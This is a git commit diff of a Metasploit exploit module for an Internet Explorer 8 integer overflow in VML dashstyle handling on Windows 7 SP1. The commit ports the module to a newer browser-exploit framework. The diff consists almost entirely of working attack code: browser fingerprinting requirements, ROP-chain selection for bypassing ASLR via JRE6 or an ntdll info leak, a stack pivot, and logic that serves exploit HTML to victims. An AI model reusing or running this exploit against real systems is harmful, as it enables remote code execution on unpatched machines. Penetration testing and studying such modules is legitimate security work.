Working version after the upgrade

bug/bundler_fix
sinn3r 2015-01-27 12:02:36 -06:00
parent 9e3388df34
commit 2dedaee9ca
1 changed files with 24 additions and 15 deletions

View File

@ -28,18 +28,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits an integer overflow vulnerability on Internet Explorer.
The vulnerability exists in the handling of the dashstyle.array length for vml
shapes on the vgx.dll module. This module has been tested successfully on Windows 7
SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
to use an info leak to disclose the ntdll.dll base address is provided. This target
requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
shapes on the vgx.dll module.
This module has been built and tested specifically against Windows 7 SP1 with
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
bypass ASLR, and by default the info leak is used. The ntdll version should be
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001).
If you wish to try the JRE6 component instead to bypass ASLR, you can set the
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
have this particular component, the exploit will refuse the attack.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Joly', # Vulnerability discovery, PoC and analysis
'4B5F5F4B', # PoC
'juan vazquez' # Metasploit module
'juan vazquez', # Metasploit module
'sinn3r' # BES upgrade
],
'References' =>
[
@ -61,10 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'BrowserRequirements' =>
{
:source => /script/i,
:os_name => OperatingSystems::WINDOWS,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => HttpClients::IE,
:ua_ver => '8.0',
},
@ -181,10 +189,10 @@ for (var i=1; i < 0x300; i++) {
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
return code if t.opts['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
case t.opts['Rop']
when :jre
print_status("Using JRE ROP")
stack_pivot = [
@ -363,13 +371,13 @@ function exploit(){
def set_rop(t, rop, info)
case rop
when /^ntdll$/i
t['Rop'] = :ntdll
t.opts['Rop'] = :ntdll
when /^jre6$/i
if info[:java] !~ /1\.6|6\.0/
raise RuntimeError, "Target does not have the suitable Java component installed for our attack"
raise RuntimeError, "Target does not have the suitable Java component (1.6) installed for our attack"
end
t['Rop'] = :jre
t.opts['Rop'] = :jre
end
return t
@ -379,11 +387,12 @@ function exploit(){
begin
my_target = set_rop(get_target, datastore['ROP'], target_info)
rescue RuntimeError => e
print_error(e.message)
# This one is just a warning, because it's a requirement check so it's not that scary.
print_warning(e.message)
return
end
if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
if my_target.opts['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
html = html_info_leak
print_status("Sending HTML to info leak...")
send_response(cli, html, {'Content-Type'=>'text/html'})